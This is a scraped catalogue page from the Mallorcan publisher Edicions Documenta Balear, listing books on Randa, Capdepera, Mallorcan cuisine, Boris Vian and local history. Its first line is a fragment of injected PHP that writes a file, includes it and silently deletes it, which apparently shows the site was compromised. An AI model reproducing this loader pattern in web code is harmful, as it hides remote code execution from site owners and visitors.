");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Catàleg
Cercador d'Obres
ORDENAR:
Començar recerca
ORDENAR:

Cant del puig de Randa

Manent i Rodon, Montserrat

El Cant del Puig de Randa és un poema unitari que vol expressar una experiència espiritual per mitjà d’un marc natural i cultural que es concreta en el binomi Randa - Ramon Llull, de ressonàncies tan ...

Cantilenes amb gelatina

Vian, Boris

La dona, el sexe, l’amistat, la vida, la mort, la llibertat i la literatura, són els temes de Vian. Malgrat l’humor que acaba inundant-ho tot.

Cantilenes amb gelatina és un recull de vint poemes de Boris Vian, escrits entre 1946 i 1949, i publicats l’any 1949 amb il·lustracions de Christiane Alanore en una edició de bibliòfil de dos-ce ...

Cap a una Europa de les regions

Acquarone, Andrea

Autonomistes, regionalistes, independentistes i neomunicipalistes.

En la seva introducció a l’edició catalana, l’autor precisa que el seu euroregionalisme no s’ha de confondre amb el neomunicipalisme dels Comuns o d’altres forces polítiques si ...

Capdepera 700 anys

Fuster Alzina, Jaume

En forma de petits quadres, com una auca, aquesta obra fa un recorregut per la història dels gabellins, des de 1231 fins als nostres dies, des del rei En Jaume fins a uns alemanys que pretenen comprar ...

Capdepera medieval: Segles XIII i XIV

Morro Veny, Guillem

Els primers segles de la dominació cristiana d'aquesta vila del llevant mallorquí, amb pinzellades sobre el procés colonitzador a Mallorca, el govern de Jaume II de Mallorca, el marc jurídic existent ...

Capítols dolços de cuina mallorquina

Contreras Mas, Antoni

Els dolços típics de la cuina mallorquina, la seva evolució i la seva cultura.

Aquest llibre és la segona part o, si voleu, la darreria del volum Capítols de cuina mallorquina. Hi trobareu notícies sobre els pastissos i dolços de l’antiga cuina illenca, de la qual podreu s ...

Capí­tols de cuina mallorquina

Contreras Mas, Antoni

Els plats típics de la cuina de Mallorca, la seva evolució i la seva cultura

L’art i la tècnica de preparar els aliments no són una casualitat. L’aparició d’un plat a taula és el darrer pas d’un camí sovint llarg i condicionat per factors molt diversos. ...

Carnaval, codolades i teatre popular

Peñarrubia i Marquès, Isabel

La Mallorca de la Restauració pot ser definida com de caciquisme rural hegemònic amb grans dosis de consens. El maurisme, i més tard Joan March, foren els eixos vertebradors que traduïren el domini so ...

Cartas a la novia. El argonauta

Gómez Ripoll, Juan; González González, Albino

Combatiente de la República Española, Albino González González, cruza la frontera francesa en los primeros meses de 1939. Internado en Argelès, meses después es liberado. Cuando estalla la Guerra Mund ...

Cas Perets

Sbert i Barceló, Cristòfol-Miquel

Vida, història i costums d’un llogaret de Mallorca.


Combinant el rigor i l’amenitat,  Cristòfol-Miquel Sbert dóna a conèixer en aquesta obra aspectes històrics, artístics i etnogràfics de Cas Perets, llogaret del terme de ses Salines. Cas Pe ...